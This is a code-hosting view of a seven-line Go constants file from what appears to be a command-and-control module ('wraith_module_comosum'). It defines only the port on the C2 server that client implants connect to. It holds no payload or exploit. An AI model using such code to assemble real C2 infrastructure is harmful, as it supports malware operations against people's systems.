wraith_module_comosum/radio/constants.go

7 lines
99 B
Go
Raw Normal View History

2023-12-29 16:10:51 +00:00
package radio
const (
// The port on the C2 which Comosum clients connect to.
C2_PORT = 45235
)